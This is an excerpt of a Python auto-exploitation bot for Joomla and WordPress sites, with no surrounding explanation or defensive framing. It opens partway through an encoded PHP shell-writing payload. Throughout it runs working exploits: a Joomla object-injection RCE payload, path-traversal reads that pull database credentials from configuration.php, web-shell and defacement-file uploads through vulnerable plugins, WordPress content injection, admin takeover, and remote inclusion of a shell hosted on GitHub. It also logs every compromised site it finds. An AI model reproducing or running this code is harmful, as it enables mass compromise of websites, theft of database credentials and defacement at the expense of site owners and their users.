WgwYlNJZ093MEtKSFJsZUhReklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d016MW1iM0JsYmlna1kyaGxZMnN6TENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RNc0pIUmxlSFF6S1RzTkNtWmpiRzl6WlNna2IzQXpLVHNOQ2cwS0RRb2tZMmhsWTJzMlBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMmx0WVdkbGN5OTJkV3h1TG1oMGJTSWdPdzBLSkhSbGVIUTJJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQnpPaTh2Y0dGemRHVmlhVzR1WTI5dEwzSmhkeTg0T0RCMVptRlhSaWNwT3cwS0pHOXdOajFtYjNCbGJpZ2tZMmhsWTJzMkxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEWXNKSFJsZUhRMktUc05DbVpqYkc5elpTZ2tiM0EyS1RzTkNqOCsnKSk7DQpmY2xvc2UoJGZwMik7DQo=')")
596. headers = {
597. 'User-Agent': pl
598. }
599. try:
600. cookies = requests.get('http://' + site, headers=headers, timeout=5).cookies
601. except:
602. pass
603. try:
604. rr = requests.get('http://' + site + '/', headers=headers, cookies=cookies, timeout=5)
605. if rr:
606. requests.get('http://' + site + '/images/vuln2.php', timeout=5)
607. requests.get('http://' + site + '/tmp/vuln2.php', timeout=5)
608. ShellCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
609. ShellCheck2 = requests.get('http://' + site + '/tmp/vuln.php', timeout=5)
610. if 'Vuln!!' in ShellCheck.text:
611. self.Print_vuln_Shell(site + '/images/vuln.php')
612. with open('result/Shell_results.txt', 'a') as writer:
613. writer.write('http://' + site + '/images/vuln.php' + '\n')
614. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
615. IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
616. if 'Vuln!!' in IndexCheck.text:
617. self.Print_Vuln_index(site + '/vuln.htm')
618. with open('result/Index_results.txt', 'a') as writer:
619. writer.write('http://' + site + '/vuln.htm' + '\n')
620. elif 'Vuln!!' in IndexCheck2.text:
621. self.Print_Vuln_index(site + '/images/vuln.htm')
622. with open('result/Index_results.txt', 'a') as writer:
623. writer.write('http://' + site + '/images/vuln.htm' + '\n')
624. elif 'Vuln!!' in ShellCheck2.text:
625. self.Print_vuln_Shell(site + '/tmp/vuln.php')
626. with open('result/Shell_results.txt', 'a') as writer:
627. writer.write('http://' + site + '/tmp/vuln.php' + '\n')
628. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
629. IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
630. if 'Vuln!!' in IndexCheck.text:
631. self.Print_Vuln_index(site + '/vuln.htm')
632. with open('result/Index_results.txt', 'a') as writer:
633. writer.write('http://' + site + '/vuln.htm' + '\n')
634. elif 'Vuln!!' in IndexCheck2.text:
635. self.Print_Vuln_index(site + '/images/vuln.htm')
636. with open('result/Index_results.txt', 'a') as writer:
637. writer.write('http://' + site + '/images/vuln.htm' + '\n')
638. else:
639. self.Print_NotVuln('RCE Joomla', site)
640. else:
641. self.Print_NotVuln('RCE Joomla', site)
642. except:
643. self.Print_NotVuln('RCE Joomla', site)
644. except:
645. self.Print_NotVuln('RCE Joomla', site)
646.  
647. def php_str_noquotes(self, data):
648. try:
649. encoded = ""
650. for char in data:
651. encoded += "chr({0}).".format(ord(char))
652. return encoded[:-1]
653. except:
654. pass
655.  
656. def generate_payload(self, php_payload):
657. try:
658. php_payload = "eval({0})".format(php_payload)
659. terminate = '\xf0\xfd\xfd\xfd';
660. exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
661. injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
662. exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
663. exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
664. return exploit_template
665. except:
666. pass
667.  
668.  
669. def Joomla_TakeADmin(self, site):
670. try:
671. GetVersion = requests.get('http://' + site + '/language/en-GB/en-GB.xml', timeout=5)
672. if 'version="3.' in GetVersion.text.encode('utf-8'):
673. os.system('python files/adminTakeover.py -u MArKAntoni -p MArKAntoni -e ' +
674. self.EMail + ' http://' + site)
675. except:
676. self.Print_NotVuln('Maybe Add Admin 3.x', site)
677.  
678. def Com_s5_media_player(self, site):
679. try:
680. Exp = 'http://' + site + \
681. '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
682. GetConfig = requests.get(Exp, timeout=5)
683. if 'JConfig' in GetConfig.text.encode('utf-8'):
684. self.Print_vuln_Config(site)
685. with open('result/Config_results.txt', 'a') as ww:
686. ww.write('Full Config Path : ' + Exp + '\n')
687. try:
688. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
689. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
690. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
691. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
692. with open('result/Config_results.txt', 'a') as ww:
693. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
694. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
695. 0] + '\n---------------------\n')
696. except:
697. pass
698. else:
699. self.Print_NotVuln('Com_s5_media_player', site)
700. except:
701. self.Print_NotVuln('Com_s5_media_player', site)
702.  
703. def Com_Hdflvplayer(self, site):
704. try:
705. Exp = 'http://' + site + \
706. '/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
707. GetConfig = requests.get(Exp, timeout=5)
708. if 'JConfig' in GetConfig.text.encode('utf-8'):
709. self.Print_vuln_Config(site)
710. with open('result/Config_results.txt', 'a') as ww:
711. ww.write('Full Config Path : ' + Exp + '\n')
712. try:
713. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
714. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
715. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
716. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
717. with open('result/Config_results.txt', 'a') as ww:
718. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
719. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
720. 0] + '\n---------------------\n')
721. except:
722. pass
723. else:
724. self.Print_NotVuln('Com_Hdflvplayer', site)
725. except:
726. self.Print_NotVuln('Com_Hdflvplayer', site)
727.  
728. def Com_Joomanager(self, site):
729. try:
730. Exp = 'http://' + site + \
731. '/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
732. GetConfig = requests.get(Exp, timeout=5)
733. if 'JConfig' in GetConfig.text.encode('utf-8'):
734. self.Print_vuln_Config(site)
735. with open('result/Config_results.txt', 'a') as ww:
736. ww.write('Full Config Path : ' + Exp + '\n')
737. try:
738. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
739. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
740. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
741. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
742. with open('result/Config_results.txt', 'a') as ww:
743. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
744. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
745. 0] + '\n---------------------\n')
746. except:
747. self.Print_NotVuln('Com_Joomanager', site)
748. else:
749. self.Print_NotVuln('Com_Joomanager', site)
750. except:
751. self.Print_NotVuln('Com_Joomanager', site)
752.  
753.  
754. def Com_Macgallery(self, site):
755. try:
756. Exp = 'http://' + site + '/index.php?option=com_macgallery&view=download&albumid=../../configuration.php'
757. GetConfig = requests.get(Exp, timeout=5)
758. if 'JConfig' in GetConfig.text.encode('utf-8'):
759. self.Print_vuln_Config(site)
760. with open('result/Config_results.txt', 'a') as ww:
761. ww.write('Full Config Path : ' + Exp + '\n')
762. try:
763. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
764. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
765. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
766. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
767. with open('result/Config_results.txt', 'a') as ww:
768. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
769. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
770. 0] + '\n---------------------\n')
771. except:
772. self.Print_NotVuln('Com_Macgallery', site)
773. else:
774. self.Print_NotVuln('Com_Macgallery', site)
775. except:
776. self.Print_NotVuln('Com_Macgallery', site)
777.  
778. def Com_CCkJseblod(self, site):
779. try:
780. Exp = 'http://' + site + '/index.php?option=com_cckjseblod&task=download&file=configuration.php'
781. GetConfig = requests.get(Exp, timeout=5)
782. if 'JConfig' in GetConfig.text.encode('utf-8'):
783. self.Print_vuln_Config(site)
784. with open('result/Config_results.txt', 'a') as ww:
785. ww.write('Full Config Path : ' + Exp + '\n')
786. try:
787. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
788. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
789. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
790. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
791. with open('result/Config_results.txt', 'a') as ww:
792. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
793. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n')
794. except:
795. self.Print_NotVuln('Com_CCkjseblod', site)
796. else:
797. self.Print_NotVuln('Com_CCkjseblod', site)
798. except:
799. self.Print_NotVuln('Com_CCkjseblod', site)
800.  
801. def Com_MyBlog(self, site):
802. try:
803. fileindex = {'fileToUpload': open(self.Jce_Deface_image, 'rb')}
804. Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload'
805. GoT = requests.post(Exp, files=fileindex, timeout=5)
806. if 'success' or 'File exists' in GoT.text.encode('utf-8'):
807. if '/images/pwn' in GoT.text.encode('utf-8'):
808. IndeXpath = 'http://' + site + '/images/pwn.gif'
809. else:
810. try:
811. GetPAth = re.findall("source: '(.*)'", GoT.text.encode('utf-8'))
812. IndeXpath = GetPAth[0]
813. except:
814. IndeXpath = 'http://' + site + '/images/pwn.gif'
815. CheckIndex = requests.get(IndeXpath, timeout=5)
816. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
817. self.Print_Vuln_index(site + '/images/pwn.gif')
818. with open('result/Index_results.txt', 'a') as writer:
819. writer.write(IndeXpath + '\n')
820. else:
821. self.Print_NotVuln('Com_MyBlog', site)
822. else:
823. self.Print_NotVuln('Com_MyBlog', site)
824. except:
825. self.Print_NotVuln('Com_MyBlog', site)
826.  
827. def Com_Jdownloads_shell(self, site):
828. try:
829. fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'), 'multipart/form-data'),
830. 'pic_upload': (self.jdShell, open(self.jdShell, 'rb'), 'multipart/form-data')}
831. post_data = {
832. 'name': 'ur name',
833. 'mail': 'hacklinkhizmeti00@gmail',
834. 'catlist': '1',
835. 'filetitle': "lolz",
836. 'description': "<p>zot</p>",
837. '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
838. 'send': 1,
839. 'senden': "Send file",
840. 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
841. 'option': "com_jdownloads",
842. 'view': "upload"
843. }
844. Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
845. Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
846. if '/upload_ok.png' in Got.text.encode('utf-8'):
847. checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.jdShell.split('/')[1]
848. Check = requests.get(checkUrl, timeout=5)
849. if 'Vuln!!' in Check.text:
850. ChecksHell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
851. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
852. if 'Vuln!!' in ChecksHell.text.encode('utf-8'):
853. self.Print_vuln_Shell(site + '/images/vuln.php')
854. with open('result/Shell_results.txt', 'a') as writer:
855. writer.write(site + '/images/vuln.php' + '\n')
856. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
857. self.Print_Vuln_index(site + '/vuln.htm')
858. with open('result/Index_results.txt', 'a') as writer:
859. writer.write(site + '/vuln.htm' + '\n')
860. else:
861. self.Com_Jdownloads(site)
862. else:
863. self.Com_Jdownloads(site)
864. else:
865. self.Com_Jdownloads(site)
866. except:
867. self.Com_Jdownloads(site)
868.  
869.  
870. def Com_Jdownloads(self, site):
871. try:
872. fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'),'multipart/form-data'),
873. 'pic_upload': (self.Jce_Deface_image, open(self.Jce_Deface_image, 'rb'), 'multipart/form-data')}
874. post_data = {
875. 'name': 'ur name',
876. 'mail': 'hacklinkhizmeti00@gmail',
877. 'catlist': '1',
878. 'filetitle': "lolz",
879. 'description': "<p>zot</p>",
880. '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
881. 'send': 1,
882. 'senden': "Send file",
883. 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
884. 'option': "com_jdownloads",
885. 'view': "upload"
886. }
887. Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
888. Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
889. if '/upload_ok.png' in Got.text.encode('utf-8'):
890. checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.Jce_Deface_image.split('/')[1]
891. Check = requests.get(checkUrl, timeout=5)
892. if 'GIF89a' in Check.text:
893. self.Print_Vuln_index(site + '/images/jdownloads/screenshots/' +
894. self.Jce_Deface_image.split('/')[1])
895. with open('result/Index_results.txt', 'a') as writer:
896. writer.write(checkUrl + '\n')
897. else:
898. self.Print_NotVuln('Com_Jdownloads', site)
899. else:
900. self.Print_NotVuln('Com_Jdownloads', site)
901. except:
902. self.Print_NotVuln('Com_Jdownloads', site)
903.  
904.  
905. def Com_Fabric(self, site):
906. try:
907. fileindex = {'userfile': (self.TextindeX, open(self.TextindeX, 'rb'), 'multipart/form-data')}
908. post_data = {
909. "name": "me.php",
910. "drop_data": "1",
911. "overwrite": "1",
912. "field_delimiter": ",",
913. "text_delimiter": "&quot;",
914. "option": "com_fabrik",
915. "controller": "import",
916. "view": "import",
917. "task": "doimport",
918. "Itemid": "0",
919. "tableid": "0"
920. }
921. Exp = 'http://' + site + "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table="
922. requests.post(Exp, files=fileindex, data=post_data, timeout=5)
923. Check = requests.get('http://' + site + '/media/' + self.TextindeX.split('/')[1])
924. if 'Vuln!!' in Check.text:
925. self.Print_Vuln_index(site + '/media/' + self.TextindeX.split('/')[1])
926. with open('result/Index_results.txt', 'a') as writer:
927. writer.write(site + '/media/' + self.TextindeX.split('/')[1] + '\n')
928. else:
929. self.Print_NotVuln('Com_Fabric', site)
930. except:
931. self.Print_NotVuln('Com_Fabric', site)
932.  
933.  
934. def Com_AdsManager(self, site):
935. try:
936. fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
937. post_data = {"name": self.Jce_Deface_image.split('/')[1]}
938. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
939. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
940. if '"jsonrpc"' in GoT.text.encode('utf-8'):
941. Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
942. if 'GIF89a' in Check.text.encode('utf-8'):
943. self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
944. with open('result/Index_results.txt', 'a') as writer:
945. writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
946. else:
947. self.Print_NotVuln('Com_AdsManager', site)
948. except:
949. self.Print_NotVuln('Com_AdsManager', site)
950.  
951. def Com_AdsManager_Shell(self, site):
952. try:
953. fileindex = {'file': open(self.indeX, 'rb')}
954. post_data = {"name": "vuln.php"}
955. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
956. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
957. if '"jsonrpc"' in GoT.text.encode('utf-8'):
958. requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
959. requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
960. Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
961. Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
962. Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
963. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
964. CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
965.  
966. if 'Vuln!!' in Check.text.encode('utf-8'):
967. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
968. self.Print_vuln_Shell(site + '/images/vuln.php')
969. with open('result/Shell_results.txt', 'a') as writer:
970. writer.write(site + '/images/vuln.php' + '\n')
971. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
972. self.Print_Vuln_index(site + '/vuln.htm')
973. with open('result/Index_results.txt', 'a') as writer:
974. writer.write(site + '/vuln.htm' + '\n')
975. else:
976. self.Com_AdsManager(site)
977. elif 'Vuln!!' in Check2.text.encode('utf-8'):
978. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
979. self.Print_vuln_Shell(site + '/images/vuln.php')
980. with open('result/Shell_results.txt', 'a') as writer:
981. writer.write(site + '/images/vuln.php' + '\n')
982. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
983. self.Print_Vuln_index(site + '/vuln.htm')
984. with open('result/Index_results.txt', 'a') as writer:
985. writer.write(site + '/vuln.htm' + '\n')
986. else:
987. self.Com_AdsManager(site)
988. elif 'Vuln!!' in Check3.text.encode('utf-8'):
989. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
990. self.Print_vuln_Shell(site + '/images/vuln.php')
991. with open('result/Shell_results.txt', 'a') as writer:
992. writer.write(site + '/images/vuln.php' + '\n')
993. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
994. self.Print_Vuln_index(site + '/vuln.htm')
995. with open('result/Index_results.txt', 'a') as writer:
996. writer.write(site + '/vuln.htm' + '\n')
997. else:
998. self.Com_AdsManager(site)
999. else:
1000. self.Com_AdsManager(site)
1001. except:
1002. self.Com_AdsManager(site)
1003.  
1004. def JCE_shell(self, site):
1005. try:
1006. fileShell = {'Filedata': open(self._shell, 'rb')}
1007. post_data = {'upload-dir': '/', 'upload-overwrite': '0', 'action': 'upload'}
1008. Exp = 'http://' + site +\
1009. '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
1010. Post = requests.post(Exp, files=fileShell, data=post_data, timeout=5)
1011. OtherMethod = '"text":"' + self._shell.split('/')[1] + '"'
1012. if OtherMethod in Post.text.encode('utf-8'):
1013. PrivMethod = {'json': "{\"fn\":\"folderRename\",\"args\":[\"/" + self._shell.split('/')[1]
1014. + "\",\"./../../images/vuln.php\"]}"}
1015. try:
1016. privExploit = 'http://' + site + '/index.php?option=com_jce&task=' \
1017. 'plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw'
1018. requests.post(privExploit, data=PrivMethod, timeout=5)
1019. try:
1020. VulnCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
1021. if 'Vuln!!' in VulnCheck.text:
1022. self.Print_vuln_Shell(site + '/images/vuln.php')
1023. with open('result/Shell_results.txt', 'a') as writer:
1024. writer.write(site + '/images/vuln.php' + '\n')
1025. self.Jce_Test(site)
1026. else:
1027. self.Jce_Test(site)
1028. except:
1029. self.Jce_Test(site)
1030. except:
1031. self.Jce_Test(site)
1032.  
1033. else:
1034. self.Jce_Test(site)
1035. except:
1036. self.Jce_Test(site)
1037.  
1038. def Jce_Test(self, site):
1039. try:
1040. fileDeface = {'Filedata': open(self.Jce_Deface_image, 'rb')}
1041. post_data = {'upload-dir': '../../', 'upload-overwrite': '0', 'action': 'upload'}
1042. Exp = 'http://' + site +\
1043. '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
1044. Post = requests.post(Exp, files=fileDeface, data=post_data, timeout=5)
1045. OtherMethod = '"text":"' + self.Jce_Deface_image.split('/')[1] + '"'
1046. if OtherMethod in Post.text.encode('utf-8'):
1047. self.Print_Vuln_index(site + '/' + self.Jce_Deface_image.split('/')[1])
1048. with open('result/Index_results.txt', 'a') as writer:
1049. writer.write(site + '/' + self.Jce_Deface_image.split('/')[1] + '\n')
1050. elif OtherMethod not in Post.text.encode('utf-8'):
1051. post_data2 = {'upload-dir': '../', 'upload-overwrite': '0', 'action': 'upload'}
1052. Post = requests.post(Exp, files=fileDeface, data=post_data2, timeout=5)
1053. if OtherMethod in Post.text.encode('utf-8'):
1054. self.Print_Vuln_index(site + '/images/' + self.Jce_Deface_image.split('/')[1])
1055. with open('result/Index_results.txt', 'a') as writer:
1056. writer.write(site + '/images/' + self.Jce_Deface_image.split('/')[1] + '\n')
1057. else:
1058. self.Print_NotVuln('Com_JCE', site)
1059. else:
1060. self.Print_NotVuln('Com_JCE', site)
1061. except:
1062. self.Print_NotVuln('Com_JCE', site)
1063.  
1064.  
1065. def alberghiExploit(self, site):
1066. try:
1067. fileDeface = {'userfile': open(self.Jce_Deface_image, 'rb')}
1068. Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php'
1069. Check = requests.get(Exp, timeout=5)
1070. if 'class="inputbox" name="userfile"' in Check.text.encode('utf-8'):
1071. Post = requests.post(Exp, files=fileDeface, timeout=5)
1072. if 'has been successfully' or 'already exists' in Post.text.encode('utf-8'):
1073. CheckIndex = requests.get(site + '/administrator/components/com_alberghi/' +
1074. self.Jce_Deface_image.split('/')[1], timeout=5)
1075. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1076. with open('result/Index_results.txt', 'a') as writer:
1077. writer.write(site + '/administrator/components/com_alberghi/' +
1078. self.Jce_Deface_image.split('/')[1] + '\n')
1079. self.Print_Vuln_index(site + '/administrator/components/com_alberghi/' +
1080. self.Jce_Deface_image.split('/')[1])
1081. else:
1082. self.Print_NotVuln('com_alberghi', site)
1083. else:
1084. self.Print_NotVuln('com_alberghi', site)
1085. else:
1086. self.Print_NotVuln('com_alberghi', site)
1087. except:
1088. self.Print_NotVuln('com_alberghi', site)
1089.  
1090. def CateGory_page_icons(self, site):
1091. try:
1092. ChckVln = requests.get('http://' + site + '/wp-content/plugins/category-page-icons/css/menu.css', timeout=5)
1093. if ChckVln.status_code == 200:
1094. Exp = 'http://' + site + '/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php'
1095. fileDeface = {'wpdev-async-upload': open(self.Jce_Deface_image, 'rb')}
1096. PostDAta = {'dir_icons': '../../../',
1097. 'submit': 'upload'}
1098. requests.post(Exp, files=fileDeface, data=PostDAta, timeout=5)
1099. CheckIndex = requests.get('http://' + site + '/wp-content/' + self.Jce_Deface_image.split('/')[1], timeout=5)
1100. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1101. with open('result/Index_results.txt', 'a') as writer:
1102. writer.write(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1] + '\n')
1103. self.Print_Vuln_index(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1])
1104. else:
1105. self.Print_NotVuln('CateGory_page_icons', site)
1106. else:
1107. self.Print_NotVuln('CateGory_page_icons', site)
1108. except:
1109. self.Print_NotVuln('CateGory_page_icons', site)
1110.  
1111.  
1112. def Downloads_Manager(self, site):
1113. try:
1114. Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif', timeout=5)
1115. if 'GIF89a' in Checkvuln.text.encode('utf-8'):
1116. PostDAta = {'dm_upload': ''}
1117. fileDeface = {'upfile': open(self.Jce_Deface_image, 'rb')}
1118. fileShell = {'upfile': open(self.pagelinesExploitShell, 'rb')}
1119. requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=5)
1120. CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
1121. self.Jce_Deface_image.split('/')[1])
1122. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1123. requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=5)
1124. requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
1125. self.pagelinesExploitShell.split('/')[1], timeout=5)
1126. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1127. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1128. self.Print_vuln_Shell(site + '/wp-content/plugins/downloads-manager/upload/' +
1129. self.pagelinesExploitShell.split('/')[1])
1130. self.Print_Vuln_index(site + '/vuln.htm')
1131. with open('result/Shell_results.txt', 'a') as writer:
1132. writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
1133. self.pagelinesExploitShell.split('/')[1] + '\n')
1134. with open('result/Index_results.txt', 'a') as writer:
1135. writer.write(site + '/vuln.htm' + '\n')
1136. else:
1137. self.Print_Vuln_index(site + '/wp-content/plugins/downloads-manager/upload/' +
1138. self.Jce_Deface_image.split('/')[1])
1139. with open('result/Index_results.txt', 'a') as writer:
1140. writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
1141. self.Jce_Deface_image.split('/')[1] + '\n')
1142. else:
1143. self.Print_NotVuln('Downloads-Manager', site)
1144. else:
1145. self.Print_NotVuln('Downloads-Manager', site)
1146. except:
1147. self.Print_NotVuln('Downloads-Manager', site)
1148.  
1149. def GetWordpressPostId(self, zzz):
1150. try:
1151. PostId = requests.get('http://' + zzz + '/wp-json/wp/v2/posts/', timeout=5)
1152. wsx = re.findall('"id":(.+?),"date"', PostId.text)
1153. postid = wsx[1].strip()
1154. return postid
1155. except:
1156. pass
1157.  
1158. def wp_content_injection(self, site):
1159. try:
1160. zaq = self.GetWordpressPostId(site)
1161. headers = {'Content-Type': 'application/json'}
1162. xxx = str(zaq) + 'bbx'
1163. data = json.dumps({
1164. 'content': '<h1>Vuln!! Path it now!!\n<p><title>Vuln!! Path it now!!<br />\n</title></p></h1>\n',
1165. 'title': 'Vuln!! Path it now!!',
1166. 'id': xxx,
1167. 'link': '/x-htm/',
1168. 'slug': '"/x-htm/"'
1169. })
1170. GoT = requests.post('http://' + site + '/wp-json/wp/v2/posts/' + str(zaq), data=data, headers=headers, timeout=10)
1171. if GoT:
1172. CheckIndex = 'http://' + site + '/x.htm'
1173. zcheck = requests.get(CheckIndex, timeout=10)
1174. if 'Vuln!!' in zcheck.text:
1175. self.Print_Vuln_index(site + '/x.htm')
1176. with open('result/Index_results.txt', 'a') as writer:
1177. writer.write(site + '/x.htm' + '\n')
1178. else:
1179. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
1180. else:
1181. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
1182. except:
1183. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
1184.  
1185. def Wp_Job_Manager(self, site):
1186. try:
1187. Exploit = '/jm-ajax/upload_file/'
1188. CheckVuln = requests.get('http://' + site + Exploit, timeout=5)
1189. if '"files":[]' in CheckVuln.text.encode('utf-8'):
1190. try:
1191. IndeXfile = {'file[]': open(self.Jce_Deface_image, 'rb')}
1192. GoT = requests.post('http://' + site + Exploit, files=IndeXfile, timeout=5)
1193. GetIndeXpath = re.findall('"url":"(.*)"', GoT.text.encode('utf-8'))
1194. IndeXpath = GetIndeXpath[0].split('"')[0].replace('\/', '/').split('/wp-content')[1]
1195. UploadedIndEX = site + '/wp-content' + IndeXpath
1196. Checkindex = requests.get('http://' + UploadedIndEX, timeout=5)
1197. if 'GIF89a' in Checkindex.text.encode('utf-8'):
1198. self.Print_Vuln_index(UploadedIndEX)
1199. with open('result/Index_results.txt', 'a') as writer:
1200. writer.write(UploadedIndEX + '\n')
1201. else:
1202. self.Print_NotVuln('Wp-Job-Manager', site)
1203. except:
1204. self.Print_NotVuln('Wp-Job-Manager', site)
1205. else:
1206. self.Print_NotVuln('Wp-Job-Manager', site)
1207. except:
1208. self.Print_NotVuln('Wp-Job-Manager', site)
1209.  
1210.  
1211. def wp_mobile_detector(self, site):
1212. try:
1213. ExploitShell = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
1214. 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/settings_auto.php'
1215. ExploitGifUpload = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
1216. 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/pwn.gif'
1217.  
1218. Ex = '/wp-content/plugins/wp-mobile-detector/resize.php'
